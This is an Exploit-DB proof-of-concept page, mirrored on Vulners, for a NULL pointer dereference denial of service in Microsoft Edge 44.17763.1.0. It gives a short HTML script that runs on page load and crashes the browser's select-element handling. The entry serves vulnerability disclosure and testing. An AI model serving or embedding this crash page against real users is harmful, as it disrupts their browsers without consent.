Lucene search
K

Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference

đŸ—“ïžÂ 07 Jan 2019 00:00:00Reported by Bogdan KurinnoyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 52 Views

Microsoft Edge 44.17763.1.0 NULL Pointer Dereference Denial of Servic

Code
<!--
ï»ż# Exploit Title: Microsoft Edge 44.17763.1.0 NULL Pointer Dereference. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-14
# Exploit Author: Bogdan Kurinnoy ([email protected])
# Vendor Homepage: https://www.microsoft.com/
# Version: Microsoft Edge 44.17763.1.0 (Microsoft EdgeHTML 18.17763)
# Tested on: Windows 10 x64
# CVE : N/A

# Description:

# Access violation while reading memory at 0x2D0 using a NULL ptr edgehtml!CSelectElement::SetItem+0x190

# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19625211/


PoC.html
-->

<html>

<head>

<script>

function f1() {
	
	try {var v1 = eventhandler1; } catch(e) { }

	var v2 = document.createElementNS("http://www.w3.org/2000/svg", “pattern”);

	v2.addEventListener("1", v1);

	var v3 = document.createElement(“option”);

	var v4 = document.createElement(“select”);

	v4[4] = v3;

}

</script>

</head>

<body onload=f1()>

</body>

</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation